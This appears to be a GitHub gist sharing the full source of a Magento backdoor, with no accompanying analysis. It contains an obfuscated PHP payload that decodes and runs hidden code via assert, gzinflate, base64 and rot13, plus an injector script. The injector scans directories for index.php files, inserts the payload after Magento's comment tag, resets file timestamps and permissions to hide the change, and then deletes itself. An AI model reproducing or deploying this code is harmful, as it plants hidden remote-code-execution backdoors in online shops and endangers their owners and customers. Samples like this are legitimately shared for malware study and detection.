Skip to content

Instantly share code, notes, and snippets.

@luckyduck luckyduck/scr.php
Created Sep 8, 2018

Embed
What would you like to do?
Magento Backdoor Malware
WORD
<?php
$regexTag = '# \* @category \s*Mage#';
$code = <<<'CODE'
*/
$swvJgN7="xQC+BaIOTBpEqTcQblQx5josN1zjqjFvNxlbbYnZNehr6bIY+iP6cwGBxTaHM7+pt5hmf2i/O4aEgvfCRfdJlMGS9RF0N5b83JCApZWFy0NHCplDxGRW3SxW0wZE142Nmf+7FgrnSoIQbmGT5MtwMBPKSMwd/iJG/YimplO02wgCM10Ivq1EtfgoP+AWezctDmP46MXr8Wwa+bgP6MMpmN5T/Yvoi22WXkzhBHd8BZvIXRoIsUADqgfvefeS3TlHavJw9VtGmBdzmU+o21+AZvXDVEK6EKSIi+R7VoiBpdhJTUstir45aKFjjBj4LdR0R/3dEzoNVQRLOmGpil9DqU6Mf1ELgyKywwxZUwOne2qLh3B/qdltngudFA0s8Abgo8gezeRq2i01pSA4MywmLEaJze7k2eJ4TWjgVurEYKKIIMHbtJhlPWOJUMswpVDHRqcsImkiHb4xEI2CBlwwNCdlKRs6eCapeVknqp3tzMzgUTqEg01/pQ7Gy7TE6HAXjlrmvNtl9GsetR2HcD0tvNzoDikre63Qr3W09fidbTWA+JEnhxeP6KfBoQKVicU/9XSZbs7JIJDhhxgAPxaLMOBqIhT5NmKJK7FzCOJYNw3QUdgw5qXzNWG2I4Abtz/H1VNhFiJcxKjvkH4Cq7eMCzKQyJ2xQB8hYxLUN4KQxDLx7KsRlYIZZgxiC65C61zk5yET7p7UC+8FRa6sbTFrV3uLcpt0T37Mj8kE2N8ZodEm93OVfcpSBjE1MGLV0CdgBF3ZxHjpk+csTtcwSjo9evDMG5vhZ8YdXUF15Pk3mG6gehYe3IbXzcg39+tIC2Cf9usIz1Y7AAhFIM/eqCAR+xguxQOa28Zj3eEA3FPb1MywzSI7okuO9sU9DoQxg0hQmcCasgiih3WK1WE+BkjBtYCGBusDU2UAvzUU4z98bF3XZTmHmzXBjuDe5JDB8M0cYW8kRzlmesMKwkDqghVgknwP/Hsm+sa3vXlOWj1pgnWep/Mrc4wini//6QMJ5Dy2h+mBsd5fwlRVhwIYTpBZ66S4k1oIMizi48YmHKJp8UGO7aHv1h2cvSGO7nmLfYOcprPgGyphzDXorfXZlikckHBnO95O4WVRCV9QA8WsR8vPL2C+qv27Q26xlTDEsA0zyruBAsC3PECmM2BJox3hkUPJjUX6ECBMd9O4NgI7+PzI9bUcLgsuuoV4R0vXmf8fLQiWIk2W1auQzQ1wfwFJaXRvB9LblI8mQwDGCIni8FoFDuf6iNTFHpxFXwMrDM77gx68xzPOZfztnTSoZPwT6PRiSWjnUt/Q8nWJ15LJ+zsTmy/j64OGOeoIjP9KUKtxL9FRvmolc3JJBOKwLsPHVUXcVdhNLF0rd6LTC0SolxR1tfR8RiU9rwba4UL9vkCg/GUbP/IbLLX+mR1OAaci/gdtFZr1VwhkuyUH+K5tQ5JLTfsS5yYU0l78QipgB/vfH8pCqbtR5Dy2cwsDuH5imorC3IVwD0kLBvli7+TM4x2SInios7JX5EzXlZQwVuAZFrSQTby6AEyhiO6iw0tLkslU5Q7Js2BNcPvbjx5hxF90IQn/HyOZfkCs1vSKygFU4cJ6rPdZdyxnAUe7aS0FSMUOvTFt5J7DSnUpmqMiNv/gUb6UqurfZmbSJKBCb28Ek2QwYSfTUHmDtVMYRcPUG+QeW/bq03UEShs3TPlEHbU8FLnJB6KYAATItrOvfKDozzdDRTk2cgXGMuMX3qSTOUK0AD/4aIjE07URNTWif12zx+cWZVok86+7DAJVD3tEGQxWocddm1FUSxjnhhcxqFo7ZDj7LqoKQeCfx6otBGLRFPy2bMCmtf1hIfDRjga4m8fFWkJkxTil72wudDzn8f4RYxyTR6CTDJhk8yyvdlZmgFveNEJn783A5SjMrGO3EAipecW+0gU8/SjjMWLoc3QrW8rFL8uk1Xjr7COxsei7PgYnIJZG0Vv9tOA9mdT23Epy1hGgkSr9YgS5DFBU5S64Mg2GaRdBpAy9+9OsqtiTfRuDT7fEqJSHo4vEDxv8i77lk6QXfCqirFvzEmIjiR82jUJAsYwDUk0Bd9xr/V79zWBeR5yPWSbOnvIwSfmpsKu5tLwGdiUa/0ebhY1cg4mGLxfnd5gYU9vUEpqVjTIznir2AWZkLdtwPQg70Rw9L8Yvjo8PXeJLgFMR+ZlAz7jdyTBlWXHn8WL+EwN16ys8wZFMYw9+IeHLyF8tXIks5A7QmKD9v2CvJdqME8lJbTn9n90d4qccXqiUopKA0lV5PWspm/Z268hDh38woVknWMfUo8Ygd7R2zNC/uFIRKkcjd9TlcXU+FYY06c/iq0EzbZZYa5AW0DHNixUfi8xyp+p9wf8zFUs3BxR0p+RIVvt0RmagzrMpwOugNdWJS3mH/4Jeys/7T9C6rHFOY9rNnrdadeCbPf1WVTr0n2JP4TYtM1HfgLrSwnwR+OwCviogt/2Ho3cw/IZL";$xnDU7="Fl1YmASDIlxhY/AX9mB3Ipa0mNtC9j411LNWnIdeERLMB";$XYD8Jw="\x61";$UbK0prw="\x73\x74";$aIYkAW="\147\172\151";$iIhWWKU5="\142\x61\x73";$XYD8Jw.="\x73";$iIhWWKU5.="\x65\66\x34";$aIYkAW.="\156\x66";$xnDU7.="5pT2FbcJngH5YzRzgfdrHFxM1pdJnsyS2zbhWxJrtHn2u";$UbK0prw.="\162\137\x72";$UbK0prw.="\x6f\164";$iIhWWKU5.="\x5f\144\145\143";$xnDU7.="cLD1x2uuMzMwPBgeLzIYhroKWTxHM+HDep5TvbzywABYN";$aIYkAW.="\154\141";$XYD8Jw.="\163\145";$iIhWWKU5.="\157\x64\x65";$UbK0prw.="\61\x33";$xnDU7.="j2TlLbXcceXnzgHZdlUxdvM6E2L7uTyPGtBYdzgLN";$XYD8Jw.="\x72\164";$aIYkAW.="\x74\x65";@$XYD8Jw($aIYkAW($iIhWWKU5($UbK0prw($xnDU7))));
/*
CODE;
define("CODE_PART", '$swvJgN7');
$injectType = 1; // 0 - before tag, 1 - after tag
$indexFiles = array('index.php');
set_time_limit(1800);
// func
function indexEditor($localpath, $indexFile, $regexTag, $code) {
$fullpath = $localpath . '/' . $indexFile;
edit($fullpath, $code, $regexTag);
}
function edit($filepath, $code, $regexTag) {
clearstatcache();
$perms = 0777 & fileperms($filepath);
chmod($filepath, 0666);
$content = file_get_contents($filepath);
preg_match($regexTag, $content, $matches);
if (!$matches)
return;
$tag = current($matches);
$tag_exists = false;
global $injectType;
$codePart = trim($code);
if ((defined("CODE_PART")) && (CODE_PART))
$codePart = CODE_PART;
if ((strpos($content, $tag) !== false) && (strpos($content, $codePart) === false)) {
$tag_exists = true;
switch ($injectType) {
case 0:
$replacement = $code . "\r\n" . $tag;
break;
case 1:
$replacement = $tag . "\r\n" . $code;
break;
}
}
if ($tag_exists) {
$lastmod = filemtime($filepath);
$inject = str_replace($tag, $replacement, $content);
if (is_writable($filepath)) {
file_put_contents($filepath, $inject, LOCK_EX);
touch($filepath, $lastmod);
chmod($filepath, $perms);
} else {
@unlink($filepath);
file_put_contents($filepath, $inject, LOCK_EX);
}
$mcontent = file_get_contents($filepath);
if (substr_count($mcontent, $code)) {
echo ' Success >> ' . $filepath . '<br>';
} else {
echo ' Cant Edit >> ' . $filepath . '<br>';
}
} else {
echo ' Already edited >> ' . $filepath . '<br>';
return;
}
}
function path_finder() {
$p = __FILE__;
if (empty($p)) {
exit('Cant find the path');
} else {
$p = str_replace('\\', '/', $p);
$p = trim($p, '/');
$p = substr_count($p, '/') - 1;
}
$pth = '';
for ($k = 1; $k <= $p; $k++) {
if (!is_readable(str_repeat('../', $k))) {
$pth = trim(str_repeat('../', $k - 1));
break;
}
}
if ($pth) {
return $pth;
} else {
return trim(str_repeat('../', $p - 1));
}
}
function smartscan($dir) {
if (function_exists("scandir")) {
return scandir($dir);
} else {
$dh = opendir($dir);
$files = array();
while (false !== ($filename = readdir($dh)))
$files[] = $filename;
return $files;
}
}
$dir = path_finder();
$dd = array($dir);
for ($i = 0; $i < 6; $i++) {
$tmp = array();
foreach ($dd as $d) {
$res = smartscan($d);
foreach ($res as $v) {
if (in_array($v, $indexFiles)) {
indexEditor($localpath = $d, $indexFile = $v, $regexTag, $code);
} else {
if (is_dir($d . '/' . $v) && is_readable($d . '/' . $v) && ($v !== ".") && ($v !== "..")) {
$tmp[] = $d . '/' . $v;
}
}
}
}
$dd = $tmp;
}
echo "Finish!";
unlink(__FILE__);
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.